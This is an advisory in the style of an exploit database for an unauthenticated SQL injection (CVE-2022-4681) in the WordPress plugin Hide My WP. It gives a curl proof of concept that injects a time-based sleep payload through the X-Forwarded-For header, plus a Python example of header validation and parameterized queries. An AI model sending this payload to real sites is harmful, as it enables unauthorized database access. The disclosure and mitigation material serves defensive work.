vendor: Hide My WP
by: Xenofon Vassilakopoulos

WordPress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi

The WordPress plugin Hide My WP, version 6.2.8 and earlier, does not properly sanitize user input before using it in a SQL query. Unauthenticated users can exploit this via an AJAX action to execute malicious SQL commands.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Hide My WP plugin to version 6.2.9 or later. Additionally, input validation and parameterized queries should be used to prevent SQL injection attacks.

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi 
# Publication Date: 2023-01-11
# Original Researcher: Xenofon Vassilakopoulos
# Exploit Author: Xenofon Vassilakopoulos
# Submitter: Xenofon Vassilakopoulos
# Vendor Homepage: https://wpwave.com/
# Version: Hide My WP v6.2.8 and prior
# Tested on: Hide My WP v6.2.7
# Impact: Database Access
# CVE: CVE-2022-4681
# CWE: CWE-89
# CVSS Score: 8.6 (high)

## Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.


## Proof of Concept

curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"
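
The mitigation above (input validation plus parameterized queries), applied to the X-Forwarded-For header that the proof of concept uses. This is an added example, not the plugin's code (the plugin is PHP; Python with an in-memory SQLite database is used here so the check runs stand-alone). The function names, the `visits` table and the sample addresses are assumptions constructed for illustration.

```python
import ipaddress
import sqlite3


def parse_forwarded_ip(header_value):
    """Return (ip, status) for an X-Forwarded-For value.

    status is "absent", "valid" or "rejected"; ip is None unless valid.
    """
    if not header_value:
        return None, "absent"
    # The left-most entry is the claimed original client.
    candidate = header_value.split(",")[0].strip()
    # Refuse IPv6 zone IDs ("fe80::1%eth0"): the part after "%" is not an address.
    if "%" in candidate:
        return None, "rejected"
    try:
        # Re-serialise the parsed object so only a canonical address is stored.
        return str(ipaddress.ip_address(candidate)), "valid"
    except ValueError:
        return None, "rejected"


def record_visit(conn, headers, remote_addr):
    """Store the visitor IP; fall back to the socket address on bad input."""
    ip, status = parse_forwarded_ip(headers.get("X-Forwarded-For"))
    stored = ip if status == "valid" else remote_addr
    # Placeholders keep the value out of the SQL text even if validation is bypassed.
    conn.execute("INSERT INTO visits (ip, xff_status) VALUES (?, ?)", (stored, status))
    return stored, status


def demo():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (ip TEXT, xff_status TEXT)")
    # Constructed requests; the second carries the header value from the PoC on this page.
    requests = [
        {"X-Forwarded-For": "203.0.113.7, 10.0.0.2"},
        {"X-Forwarded-For": "127.0.0.1'+(select*from(select(sleep(20)))a)+'"},
        {},
    ]
    for headers in requests:
        record_visit(conn, headers, "198.51.100.9")
    return conn.execute("SELECT ip, xff_status FROM visits").fetchall()


if __name__ == "__main__":
    for row in demo():
        print(row)
```

A header that passes this check is still client-supplied unless a trusted proxy sets it, so it should not be used for access decisions. Rows with `xff_status` of `rejected` are a useful signal to alert on.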